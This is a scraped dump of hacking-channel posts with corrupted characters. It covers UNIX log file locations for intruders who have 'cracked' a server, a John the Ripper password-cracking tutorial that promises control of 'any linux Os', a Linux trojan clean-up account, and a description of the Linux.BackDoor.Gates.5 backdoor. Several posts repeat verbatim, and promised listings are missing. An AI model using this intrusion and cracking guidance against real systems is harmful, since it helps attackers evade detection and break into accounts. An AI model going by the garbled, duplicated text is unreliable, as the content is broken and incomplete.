β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Now After Cracking A linux server wanna analyse The log file :
fb.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) it is necessary to introduce the UNIX log files. Many intruders don't want hacked computers to track them, how do they do that.
2) The system administrator mainly relies on the system's LOG, which is often called the log file, to obtain the traces of the intrusion and the IP and other information of the intruder. Of course, some administrators use third-party tools to record information about intruding into a computer. Here we mainly talk about files that record intrusion traces in general U NIX systems.
3) There are several versions of UNIX systems, each system has different LOG files, but most should have about the same storage location, the most common location is the following several:
/ usr / adm, earlier versions of UNIX;
/ var / adm, newer versions use this location;
/ var / log, some versions of Solaris, Linux BSD, Free BSD use this location;
/ etc, most UNIX versions put utmp here, some also put wtmp here This is also the location of syslog.conf.
4) The functions of some files are listed below, of course, they also differ according to different invaded systems.
> acct or pacct, which records the command records used by each user;
access_log, which is mainly used to run NCSA HTTPD on the server, what sites in this log file will connect to your server
aculog, which holds the MODEMS record you dialed out;
lastlog, which records the user's recent login record and the initial destination of each user, sometimes the last unsuccessful login;
loginlog, which records some abnormal login records;
messages , Record the output output to the system console, and other information is generated by syslog;
security, record some cases of using the UUCP system to attempt to enter the restricted range;
>sulog, record the record using the su command;
utmp, record the current login to the system For all users, this file changes constantly as the user enters and leaves the system;
utmpx, an extension of UTMP;
wtmp, records user login and logout events;
syslog, the most important log file, is obtained using the syslogd daemon.
π¦ Log information:
1) / dev / log, a UNIX domain socket that accepts messages generated by processes running on the local machine;
2) / dev / klog, a device that receives messages from the UNIX kernel;
port 514, an Internet socket , Accepting syslog messages generated by other machines via UDP;
3) Uucp, the recorded UUCP information, can be updated by local UUCP activities, and can also be modified by actions initiated by remote sites. The information includes calls made and accepted, requests made, sender , Sending time and sending host;
4) lpd-errs, a log that handles printer fault information;
ftp log, you can obtain the recording function by executing ftpd with the -l option;
httpd log, HTTPD server records each web access record in the log;
History log, this file keeps a record of the user's recent input commands;
vold.log, records errors encountered when using external media.
5) The above introduces the main steps of hacking the server, and the reader should now have some basic knowledge about it. It needs to be emphasized again that if the reader lacks knowledge of the UNIX system, it is absolutely impossible to master it.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How To Use Johna The Ripper-Full :Crack anything with your windows -linux :
twitter.com/UndercOdeTC
1) Download https://www.openwall.com/john/ (official )
2) let s try on any windows 10
from cmd go to dir <folder name... >
3) run .\john.exe
4) This command below tells JtR to try βsimpleβ mode, then the default wordlists containing likely passwords, and then βincrementalβ mode.
.\john.exe passwordfile
5) choose your worldlist and run :
.\john.exe passwordfile βwordlist=βwordlist.txtβ
6) If you want to specify a cracking mode use the exact parameter for the mode.
.\john.exe --single passwordfile
.\john.exe --incremental passwordfile
7) adding rules to cracking mode :
.\john.exe --wordlist=βwordlist.txtβ --rules --passwordfile
8) to see results :
>.\john.exe βshow passwordfile
9) you wanna to see if you cracked any root users (UID=0) use the βusers parameter.
.\john.exe --show --users=0 passwordfile
10) Well You Can start Cracking Now
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How To Use Johna The Ripper-Full :Crack anything with your windows -linux :
twitter.com/UndercOdeTC
1) Download https://www.openwall.com/john/ (official )
2) let s try on any windows 10
from cmd go to dir <folder name... >
3) run .\john.exe
4) This command below tells JtR to try βsimpleβ mode, then the default wordlists containing likely passwords, and then βincrementalβ mode.
.\john.exe passwordfile
5) choose your worldlist and run :
.\john.exe passwordfile βwordlist=βwordlist.txtβ
6) If you want to specify a cracking mode use the exact parameter for the mode.
.\john.exe --single passwordfile
.\john.exe --incremental passwordfile
7) adding rules to cracking mode :
.\john.exe --wordlist=βwordlist.txtβ --rules --passwordfile
8) to see results :
>.\john.exe βshow passwordfile
9) you wanna to see if you cracked any root users (UID=0) use the βusers parameter.
.\john.exe --show --users=0 passwordfile
10) Well You Can start Cracking Now
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Well Done, After those Underc0de Tutorials You Are Able to crack any linux Os, To get controle or...
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How To Know If Your Linux Is Hacked ?
The experience of a Linux server being hacked and deleted :I. Background full tutorial :
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) In the evening, I saw a server running very high traffic, which is obviously not the same as usual. The traffic reached 800Mbps. The first impression should be a Trojan horse, and it was being treated as a broiler.
2) For the best performance of our server, the firewall (iptables) is not turned on, but there is a physical firewall in front of the server, and the machine is doing port mapping, which is not a common port. It should be fully secure in theory Recently got involved with the Trojan. It always keeps me coming. I also take this opportunity to record the discovery process.
3) Find and track
a) View the traffic graph and find the problem
The web page is very stuck when viewed, and sometimes it doesn't even respond.
b) top dynamic view process
I immediately remotely logged in to the server with the problem. The remote operation was very stuck. The traffic from the network card was very large. I found an abnormal process through top that took up a lot of resources. I did nβt look at the name and thought it was a Web service process.
c) ps command to view the path of the process
I found this program file under the / etc directory, which is a binary program. I copied it and put it near this article for everyone to study on the virtual machine, haha.
d) End the abnormal process and continue tracking
killall -9 nginx1
rm -f / etc / nginx1
After killing the process, the traffic immediately came down, and the remote was not blocked. Do you delete the program file and kill the abnormal process? Do we think that the processing is complete? It is certainly not that simple to think about it. This is a Trojan. Generate the program file by ourselves (as expected, I did generate it later before I figured it out), we have to continue to track down.
e) View login records and log files secure
Run the command last to view the account login records. Everything is normal. Checking the system file message did not find anything, but when I checked the secure file, I found that there were some abnormalities. It was related to authentication anyway. Should I try to connect to control the packet sending?
f) ps check the process again
In fact, there was this problem during the first ps. At that time, it was not found. The second time was to study each process by self-study. The self-study looked for a less normal process and found a strange ps process.
g) I found a normal machine and checked the size of the ps command. The normal size is about 81KB. Then the ps on this machine is as high as 1.2M. The command file must be replaced.
h) Then I went into the directory of another ps and saw the following commands. Then I checked these commands of the system and found that they all became very large, all reached 1.2M. These system command files must be all Replaced.
π¦ 1) More abnormal files found
Looking at the crontab of the timed task file, I didn't find anything. Then I looked at the system startup file rc.local, and there was nothing abnormal. Then I went into the /etc/init.d directory to see the strange script files DbSecuritySpt, selinux.
2) The first file can be seen that he started the abnormal file. The second one should be related to the login. I don't know the specifics anyway, there must be a problem anyway.
3) Since it is related to login, then find the one related to ssh. I found the following file, which is a hidden file. This is also a Trojan file. Let's record it first, so that the program names are very similar to our service name. Both of them are 1.2M in size and they may be a file.
4) I took a look at the directory / tmp that the Trojan likes to appear, and also found abnormal files. From the name, I felt like I was monitoring the Trojan horse program-
π¦How To Know If Your Linux Is Hacked ?
The experience of a Linux server being hacked and deleted :I. Background full tutorial :
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) In the evening, I saw a server running very high traffic, which is obviously not the same as usual. The traffic reached 800Mbps. The first impression should be a Trojan horse, and it was being treated as a broiler.
2) For the best performance of our server, the firewall (iptables) is not turned on, but there is a physical firewall in front of the server, and the machine is doing port mapping, which is not a common port. It should be fully secure in theory Recently got involved with the Trojan. It always keeps me coming. I also take this opportunity to record the discovery process.
3) Find and track
a) View the traffic graph and find the problem
The web page is very stuck when viewed, and sometimes it doesn't even respond.
b) top dynamic view process
I immediately remotely logged in to the server with the problem. The remote operation was very stuck. The traffic from the network card was very large. I found an abnormal process through top that took up a lot of resources. I did nβt look at the name and thought it was a Web service process.
c) ps command to view the path of the process
I found this program file under the / etc directory, which is a binary program. I copied it and put it near this article for everyone to study on the virtual machine, haha.
d) End the abnormal process and continue tracking
killall -9 nginx1
rm -f / etc / nginx1
After killing the process, the traffic immediately came down, and the remote was not blocked. Do you delete the program file and kill the abnormal process? Do we think that the processing is complete? It is certainly not that simple to think about it. This is a Trojan. Generate the program file by ourselves (as expected, I did generate it later before I figured it out), we have to continue to track down.
e) View login records and log files secure
Run the command last to view the account login records. Everything is normal. Checking the system file message did not find anything, but when I checked the secure file, I found that there were some abnormalities. It was related to authentication anyway. Should I try to connect to control the packet sending?
f) ps check the process again
In fact, there was this problem during the first ps. At that time, it was not found. The second time was to study each process by self-study. The self-study looked for a less normal process and found a strange ps process.
g) I found a normal machine and checked the size of the ps command. The normal size is about 81KB. Then the ps on this machine is as high as 1.2M. The command file must be replaced.
h) Then I went into the directory of another ps and saw the following commands. Then I checked these commands of the system and found that they all became very large, all reached 1.2M. These system command files must be all Replaced.
π¦ 1) More abnormal files found
Looking at the crontab of the timed task file, I didn't find anything. Then I looked at the system startup file rc.local, and there was nothing abnormal. Then I went into the /etc/init.d directory to see the strange script files DbSecuritySpt, selinux.
2) The first file can be seen that he started the abnormal file. The second one should be related to the login. I don't know the specifics anyway, there must be a problem anyway.
3) Since it is related to login, then find the one related to ssh. I found the following file, which is a hidden file. This is also a Trojan file. Let's record it first, so that the program names are very similar to our service name. Both of them are 1.2M in size and they may be a file.
4) I took a look at the directory / tmp that the Trojan likes to appear, and also found abnormal files. From the name, I felt like I was monitoring the Trojan horse program-
5) Thinking of this, there should be a lot of replacement commands. We can't solve it by relying on us alone. My suggestion is to reinstall the operating system and make good security policies.
> the Trojan manually clear
π¦ The general steps are summarized as follows:
1) Simple judgment of Trojan horse
2) Upload the following command to / root
ps netstat ss lsof
3) Delete the following directories and files
4) Find out abnormal programs and kill
5) Remove the command containing Trojan and reinstall (or copy the normal program uploaded in the past)
It seems that reinstalling by myself doesn't work. I am looking for a normal machine copy command.
π¦ antivirus tools scan
1) Install the anti-virus tool clamav
2) Start the service
service clamd restart
3) Update the virus database
Since ClamAV is not the latest version, there is an alert message. You can ignore or upgrade the latest version.
4) Scanning method
You can use clamscan -h to view the corresponding help information
5) check the log and find
Delete the found command and replace the normal one
> Appendix: Linux.BackDoor.Gates.5
After querying the information, this Trojan should be Linux.BackDoor.Gates.5, find a file, the content is as follows:
6) Some users have a deep-rooted concept that there is no malware that can actually threaten the Linux kernel operating system, but this concept is facing increasing challenges.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
> the Trojan manually clear
π¦ The general steps are summarized as follows:
1) Simple judgment of Trojan horse
2) Upload the following command to / root
ps netstat ss lsof
3) Delete the following directories and files
4) Find out abnormal programs and kill
5) Remove the command containing Trojan and reinstall (or copy the normal program uploaded in the past)
It seems that reinstalling by myself doesn't work. I am looking for a normal machine copy command.
π¦ antivirus tools scan
1) Install the anti-virus tool clamav
2) Start the service
service clamd restart
3) Update the virus database
Since ClamAV is not the latest version, there is an alert message. You can ignore or upgrade the latest version.
4) Scanning method
You can use clamscan -h to view the corresponding help information
5) check the log and find
Delete the found command and replace the normal one
> Appendix: Linux.BackDoor.Gates.5
After querying the information, this Trojan should be Linux.BackDoor.Gates.5, find a file, the content is as follows:
6) Some users have a deep-rooted concept that there is no malware that can actually threaten the Linux kernel operating system, but this concept is facing increasing challenges.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦When Exactly locate the torgan process ?
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
1) Described here is a Trojan in the malware family Linux.BackDoor.Gates: Linux.BackDoor.Gates.5.
2) This malware combines the functionality of traditional backdoors and DDoS attack Trojans to infect 32-bit Linux versions. Its characteristics can be concluded that it belongs to the same virus writer as the Linux.DnsAmp and Linux.DDoS family Trojans.
3) The new Trojan consists of two functional modules: the basic module is a backdoor program capable of executing instructions issued by the criminals, and the second module is saved to the hard disk during the installation process for DDoS attacks. Linux.BackDoor.Gates.5 collects and forwards the following information of the infected computer to the criminals during the operation:
> Number of CPU cores (read from / proc / cpuinfo).
CPU speed (read from / proc / cpuinfo).
CPU usage (read from / proc / stat).
Gate'a's IP (read from / proc / net / route).
Gate'a's MAC address (read from / proc / net / arp).
Network interface information (read from / proc / net / dev).
MAC address of the network device.
Memory (using the MemTotal parameter in / proc / meminfo).
The amount of data sent and received (read from / proc / net / dev).
Operating system name and version (by calling the uname command).
After booting, Linux.BackDoor.Gates.5 checks the path of its startup folder and implements four behavior modes based on the results of the check.
π¦If the path of the backdoor program's executable file is inconsistent with the path of the netstat, lsof, and ps tools, the Trojan will pretend to be a daemon to start in the system, then initialize it, and decompress the configuration file during the initialization process. The configuration file contains various data necessary for the Trojan to run, such as the management server IP address and port, and backdoor program installation parameters.
> According to the g_iGatsIsFx parameter value in the configuration file, the Trojan may actively connect to the management server or wait for a connection: After successful installation, the backdoor program will detect the IP address of the site it is connected to, and then use the site as a command server.
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦When Exactly locate the torgan process ?
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
1) Described here is a Trojan in the malware family Linux.BackDoor.Gates: Linux.BackDoor.Gates.5.
2) This malware combines the functionality of traditional backdoors and DDoS attack Trojans to infect 32-bit Linux versions. Its characteristics can be concluded that it belongs to the same virus writer as the Linux.DnsAmp and Linux.DDoS family Trojans.
3) The new Trojan consists of two functional modules: the basic module is a backdoor program capable of executing instructions issued by the criminals, and the second module is saved to the hard disk during the installation process for DDoS attacks. Linux.BackDoor.Gates.5 collects and forwards the following information of the infected computer to the criminals during the operation:
> Number of CPU cores (read from / proc / cpuinfo).
CPU speed (read from / proc / cpuinfo).
CPU usage (read from / proc / stat).
Gate'a's IP (read from / proc / net / route).
Gate'a's MAC address (read from / proc / net / arp).
Network interface information (read from / proc / net / dev).
MAC address of the network device.
Memory (using the MemTotal parameter in / proc / meminfo).
The amount of data sent and received (read from / proc / net / dev).
Operating system name and version (by calling the uname command).
After booting, Linux.BackDoor.Gates.5 checks the path of its startup folder and implements four behavior modes based on the results of the check.
π¦If the path of the backdoor program's executable file is inconsistent with the path of the netstat, lsof, and ps tools, the Trojan will pretend to be a daemon to start in the system, then initialize it, and decompress the configuration file during the initialization process. The configuration file contains various data necessary for the Trojan to run, such as the management server IP address and port, and backdoor program installation parameters.
> According to the g_iGatsIsFx parameter value in the configuration file, the Trojan may actively connect to the management server or wait for a connection: After successful installation, the backdoor program will detect the IP address of the site it is connected to, and then use the site as a command server.
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
This media is not supported in your browser
VIEW IN TELEGRAM